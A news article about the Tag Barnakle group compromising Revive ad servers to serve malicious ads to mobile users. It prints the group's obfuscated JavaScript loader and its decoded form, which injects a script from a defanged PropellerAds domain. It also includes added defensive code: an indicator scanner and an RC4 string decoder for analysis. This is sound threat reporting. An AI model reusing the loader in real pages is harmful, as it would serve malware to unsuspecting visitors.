Millions of web surfers are targeted by a single malvertising group


Hackers have compromised more than 120 ad servers in an ongoing campaign over the past year that displayed malicious advertisements on tens of millions, if not hundreds of millions, of devices visiting websites that are outwardly harmless.

Malvertising is the practice of serving malicious ads to people who visit trusted websites. The ads carry embedded JavaScript that covertly exploits software bugs or tries to trick visitors into installing an unsafe app, paying fraudulent computer-support fees, or taking other harmful actions. Typically, the scammers behind this internet scourge pose as buyers and pay ad-delivery networks to display the malicious ads on individual websites.

Going for the jugular

Infiltrating the ad ecosystem as a legitimate buyer requires resources. For one, scammers have to invest time learning how the market works and then create an entity with a trustworthy reputation. The approach also requires paying cash to buy the space in which the malicious ads are served. This is not the technique of the malvertising group that security firm Confiant calls Tag Barnakle.

“Tag Barnakle, on the other hand, can bypass this initial hurdle completely by going straight to the jugular – a mass compromise of ad serving infrastructure,” wrote Confiant researcher Eliya Stein in a blog post published on Monday. “They probably also have an ROI [return on investment] that would dwarf their rivals as they don’t have to spend a dime running advertising campaigns.”

In the past year, Tag Barnakle has infected more than 120 servers running Revive, an open source app for businesses that want to run their own ad server instead of relying on a third-party service. That figure is twice the number of infected Revive servers that Confiant found last year.

Once an ad server is compromised, Tag Barnakle loads a malicious payload onto it. To avoid detection, the group uses client-side fingerprinting to ensure that only a small number of the most attractive targets receive the malicious ads. The servers that deliver a secondary payload to those targets also use cloaking techniques so that they, too, fly under the radar.
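Because the injected code lives in what the compromised ad server hands out, an operator can check that output for the loader's tell-tale shape before any visitor is fingerprinted. The following is an added example written for this article, not Confiant's or Revive's code: a small indicator scan over the JavaScript an ad server serves. The heuristics are modelled on the payload quoted later in the article (hex-named `_0x…` identifiers, the atob / charCodeAt / fromCharCode decode trio, a runtime-created script element, the `document.body || document.documentElement` append) plus a domain watchlist. The two watchlist domains are the defanged domains quoted in the article; both sample tags and the scoring weights are constructed here for illustration.

```javascript
// Added example: indicator scan for injected loaders in ad-server output.
// Not part of the article or of Revive; the samples and weights are constructed.

// Defanged domains quoted in the article, written as real hostnames for comparison.
const WATCHLIST = ['galikos.com', 'overgalladean.com'];

// Textual indicators with the minimum hit count that makes each one count.
const INDICATORS = [
  { name: 'hex-identifiers', re: /_0x[0-9a-f]{4,}/g, min: 5 },
  { name: 'atob',            re: /\batob\b/g, min: 1 },
  { name: 'charCodeAt',      re: /charCodeAt/g, min: 1 },
  { name: 'fromCharCode',    re: /fromCharCode/g, min: 1 },
  { name: 'dynamic-script',  re: /createElement\(\s*["']script["']\s*\)/gi, min: 1 },
  { name: 'append-to-body',  re: /appendChild|document\.body\s*\|\|\s*document\.documentElement/g, min: 1 },
];

// Hostnames in the text, with "[.]" defanging undone so that a defanged
// indicator list and live content compare equally.
function extractHosts(text) {
  const hosts = new Set();
  const re = /https?:\/\/([a-z0-9.\-\[\]]+)/gi;
  let m;
  while ((m = re.exec(text)) !== null) {
    hosts.add(m[1].replace(/\[\.\]/g, '.').toLowerCase());
  }
  return [...hosts];
}

// Weights (constructed): the decode trio is the strongest textual signal,
// a watchlist hit is decisive on its own.
function scoreHits(hits) {
  const has = n => hits.some(h => h.startsWith(n + '('));
  let score = 0;
  if (has('atob') && has('charCodeAt') && has('fromCharCode')) score += 2;
  if (has('hex-identifiers')) score += 1;
  if (has('dynamic-script')) score += 1;
  if (has('append-to-body')) score += 1;
  score += 3 * hits.filter(h => h.startsWith('watchlist:')).length;
  return score;
}

function scanAdTag(text) {
  const hits = [];
  for (const ind of INDICATORS) {
    const n = (text.match(ind.re) || []).length;
    if (n >= ind.min) hits.push(`${ind.name}(${n})`);
  }
  for (const h of extractHosts(text)) {
    if (WATCHLIST.includes(h)) hits.push(`watchlist:${h}`);
  }
  const score = scoreHits(hits);
  return { suspicious: score >= 3, score, hits };
}

// Constructed benign tag: one script element pointing at a placeholder host.
const BENIGN_SAMPLE = [
  "var s = document.createElement('script');",
  "s.src = 'https://ads.example.com/delivery/async.js';",
  "document.body.appendChild(s);",
].join('\n');

// Constructed injected loader in the shape of the quoted payload (zone id is a placeholder).
const INJECTED_SAMPLE = [
  'var _0x1a2b = ["charCodeAt","fromCharCode","atob","length"];',
  'var _0x3c4d = function(_0x5e6f){ return _0x1a2b[_0x5e6f - 0x0]; };',
  'var _0x7a8b = document[decode("...")](decode("..."));',
  'var bundle = document.body || document.documentElement;',
  'bundle[decode("...")](_0x7a8b);',
  '// src resolves to https://overgalladean[.]com/apu.php?zoneid=PLACEHOLDER',
].join('\n');

if (typeof require !== 'undefined' && require.main === module) {
  console.log(scanAdTag(BENIGN_SAMPLE));   // score 2, not flagged
  console.log(scanAdTag(INJECTED_SAMPLE)); // score 7, flagged
}
```

The threshold is deliberately above what an ordinary async ad tag produces (it creates and appends a script element too), so only the decode trio together with other loader traits, or a watchlist domain, trips it. A loader obfuscated by a different tool may avoid the `_0x` naming and the literal method names, so treat this as a triage aid and pair it with file-integrity checks on the ad server itself.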




When Confiant reported on Tag Barnakle last year, it found the group had infected around 60 Revive servers. That foothold allowed the group to distribute ads across more than 360 web properties. The ads pushed fake Adobe Flash updates that, when run, installed malware on desktop computers.

This time around, Tag Barnakle is targeting both iPhone and Android users. Websites receiving an ad through a compromised server deliver heavily obfuscated JavaScript that determines whether a visitor is using an iPhone or Android device.

https://galikos[.]com/ci.html?mAn8iynQtt=SW50ZWwgSqW5jPngyMEludGVsKFIpIElyaXMoVE0OIFBsdXMgR3J3cGhpY37gNjU1

Visitors who pass this and other fingerprint tests receive a secondary payload that looks like this:

var _0x209b = ["charCodeAt", "fromCharCode", "atob", "length"];
(function (_0x58f22e, _0x209b77) {
    var _0x3a54d6 = function (_0x562d16) {
        while (--_0x562d16) {
            _0x58f22e["push"](_0x58f22e["shift"]());
        }
    };
    _0x3a54d6(++_0x209b77);
}(_0x209b, 0x1d9));
var _0x3a54 = function (_0x58f22e, _0x209b77) {
    _0x58f22e = _0x58f22e - 0x3;
    var _0x3a54d6 = _0x209b[_0x58f22e];
    return _0x3a54d6;
};
function pr7IbU3HZp6(_0x2df7f1, _0x4ed28f) {
    var _0x40b1c0 = [], _0xfa98e6 = 0x0, _0x1d2d3f, _0x4daddb = "";
    for (var _0xaefdd9 = 0x0; _0xaefdd9 < 0x100; _0xaefdd9++) {
        _0x40b1c0[_0xaefdd9] = _0xaefdd9;
    }
    for (_0xaefdd9 = 0x0; _0xaefdd9 < 0x100; _0xaefdd9++) {
        _0xfa98e6 = (_0xfa98e6 + _0x40b1c0[_0xaefdd9] + _0x4ed28f["charCodeAt"](_0xaefdd9 % _0x4ed28f[_0x3a54("0x2")])) % 0x100, _0x1d2d3f = _0x40b1c0[_0xaefdd9], _0x40b1c0[_0xaefdd9] = _0x40b1c0[_0xfa98e6], _0x40b1c0[_0xfa98e6] = _0x1d2d3f;
    }
    _0xaefdd9 = 0x0, _0xfa98e6 = 0x0;
    for (var _0x2bdf25 = 0x0; _0x2bdf25 < _0x2df7f1[_0x3a54("0x2")]; _0x2bdf25++) {
        _0xaefdd9 = (_0xaefdd9 + 0x1) % 0x100, _0xfa98e6 = (_0xfa98e6 + _0x40b1c0[_0xaefdd9]) % 0x100, _0x1d2d3f = _0x40b1c0[_0xaefdd9], _0x40b1c0[_0xaefdd9] = _0x40b1c0[_0xfa98e6], _0x40b1c0[_0xfa98e6] = _0x1d2d3f, _0x4daddb += String[_0x3a54("0x0")](_0x2df7f1[_0x3a54("0x3")](_0x2bdf25) ^ _0x40b1c0[(_0x40b1c0[_0xaefdd9] + _0x40b1c0[_0xfa98e6]) % 0x100]);
    }
    return _0x4daddb;
}
function fCp5tRneHK(_0x2deb18) {
    var _0x3d61b2 = "";
    try {
        _0x3d61b2 = window[_0x3a54("0x1")](_0x2deb18);
    } catch (_0x4b0a86) {}
    return _0x3d61b2;
};
var qIxFjKSY6BVD = ["Bm2CdEOGUagaqnegJWgXyDAnxs1BSQNre5yS6AKl2Hb2j0+gF6iL1n4VxdNf+D0/", "DWuTZUTZO+sQsXe8Ng==", "j6nfa3m", "Y0d83rLB", "Y0F69rbB65Ug6d9y", "gYTeJruwFuW", "n3j6Vw==", "n2TyRkwJoyYulkipRrYr", "dFCGtizS", "yPnc", "2vvPcUEpsBZhStE=", "gfDZYmHUEBxRWrw4M"];
var aBdDGL0KZhomY5Zl = document[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[1]), qIxFjKSY6BVD[2])](pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[3]), qIxFjKSY6BVD[5]));
aBdDGL0KZhomY5Zl[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[4]), qIxFjKSY6BVD[5])](pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[6]), qIxFjKSY6BVD[8]), pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[7]), qIxFjKSY6BVD[8]));
aBdDGL0KZhomY5Zl[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[4]), qIxFjKSY6BVD[5])](pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[9]), qIxFjKSY6BVD[11]), pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[0]), qIxFjKSY6BVD[2]));
var bundle = document.body || document.documentElement;
bundle[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[10]), qIxFjKSY6BVD[11])](aBdDGL0KZhomY5Zl);

Decoded, the payload is:

var aBdDGL0KZhomY5Zl = document["createElement"]("script");
aBdDGL0KZhomY5Zl["setAttribute"]("text/javascript");
aBdDGL0KZhomY5Zl["setAttribute"]("src", "https://overgalladean[.]com/apu.php?zoneid=2721667");
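The decoding step above can be reproduced offline, which is how an analyst recovers such strings without executing the ad. In the obfuscated sample, fCp5tRneHK is just window.atob wrapped in try/catch, and pr7IbU3HZp6 is textbook RC4: two key-scheduling loops over a 256-entry table, then one XOR pass with the keystream, using the neighbouring table entry as the key. The block below is an added example written for this article, not Confiant's or the attacker's code: a readable reimplementation of that decoder for Node.js (Buffer stands in for the browser's atob), applied to the string table and the (ciphertext, key) pairings exactly as they appear in the sample, plus a constructed round trip using the page's first key string so the routine can be checked against known plaintext.

```javascript
// Added example: readable version of the payload's string decoder (RC4 over
// base64). Not part of the article; the round-trip words below are constructed.

function rc4(key, data) {
  // Key-scheduling algorithm: the first two loops of pr7IbU3HZp6
  const S = Array.from({ length: 256 }, (_, i) => i);
  let j = 0;
  for (let i = 0; i < 256; i++) {
    j = (j + S[i] + key.charCodeAt(i % key.length)) & 0xff;
    [S[i], S[j]] = [S[j], S[i]];
  }
  // Keystream generation: the third loop, XORing one byte at a time
  let i = 0, out = '';
  j = 0;
  for (let k = 0; k < data.length; k++) {
    i = (i + 1) & 0xff;
    j = (j + S[i]) & 0xff;
    [S[i], S[j]] = [S[j], S[i]];
    out += String.fromCharCode(data.charCodeAt(k) ^ S[(S[i] + S[j]) & 0xff]);
  }
  return out;
}

// fCp5tRneHK equivalent: base64 -> binary string ('latin1' keeps bytes 0-255 as one char each)
function b64decode(s) {
  return Buffer.from(s, 'base64').toString('latin1');
}

// One table lookup as the payload performs it: pr7IbU3HZp6(fCp5tRneHK(cipher), key)
function decodeEntry(cipherB64, key) {
  return rc4(key, b64decode(cipherB64));
}

// Inverse of decodeEntry; RC4 is symmetric, so this just base64-wraps the result.
function encodeEntry(plain, key) {
  return Buffer.from(rc4(key, plain), 'latin1').toString('base64');
}

// The string table as printed in the sample, and the (ciphertext, key) index
// pairs visible in its calls: entries 2, 5, 8 and 11 serve as keys.
const PAGE_TABLE = [
  'Bm2CdEOGUagaqnegJWgXyDAnxs1BSQNre5yS6AKl2Hb2j0+gF6iL1n4VxdNf+D0/',
  'DWuTZUTZO+sQsXe8Ng==', 'j6nfa3m', 'Y0d83rLB', 'Y0F69rbB65Ug6d9y',
  'gYTeJruwFuW', 'n3j6Vw==', 'n2TyRkwJoyYulkipRrYr', 'dFCGtizS', 'yPnc',
  '2vvPcUEpsBZhStE=', 'gfDZYmHUEBxRWrw4M',
];
const PAIRINGS = [[1, 2], [3, 5], [4, 5], [6, 8], [7, 8], [9, 11], [0, 2], [10, 11]];

function decodePageTable(table = PAGE_TABLE, pairings = PAIRINGS) {
  return pairings.map(([c, k]) => ({ index: c, value: decodeEntry(table[c], table[k]) }));
}

// Constructed round trip: encode the method names the decoded payload uses
// with the sample's first key, then decode them again.
const DEMO_KEY = 'j6nfa3m';
const DEMO_WORDS = ['createElement', 'script', 'setAttribute', 'src', 'appendChild'];
function roundTrip(words = DEMO_WORDS, key = DEMO_KEY) {
  return words.map(w => decodeEntry(encodeEntry(w, key), key));
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(roundTrip());
  console.log(decodePageTable());
}
```

Because RC4 never changes length, the base64 sizes alone already tell an analyst what to expect: the 13-, 6-, 12-, 4-, 15-, 3-, 48- and 11-byte entries line up with createElement, script, setAttribute, type, text/javascript, src, the overgalladean[.]com URL and appendChild. Any transcription error in the printed table would show up as garbage in decodePageTable() rather than as a crash.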

As the decoded payload shows, the ads are served through overgalladean[.]com, a domain that Confiant says is used by PropellerAds, an advertising network that security companies such as Malwarebytes have long documented as malicious.

When Confiant researchers followed the PropellerAds click tracker on the types of devices Tag Barnakle was targeting, they saw ads like this:


Served tens of millions

The ads mostly lure targets to App Store listings for fake security or VPN apps with hidden subscription costs or “traffic diverted for nefarious purposes”.

Because ad servers are often integrated with multiple ad exchanges, the ads can spread to hundreds, possibly thousands, of individual websites. Confiant doesn’t know how many end users are exposed to the advertising, but the company believes the number is high.

“When we consider that some of these media companies have done this [Revive] by integrating with leading programmatic advertising platforms, Tag Barnakle’s reach is easily in the tens, if not hundreds, of millions of devices,” Stein wrote. “This is a conservative estimate that takes into account the fact that they are placing cookies on their victims to detect the payload with low frequency, which is likely to slow the detection of their presence.”


Steven Gregory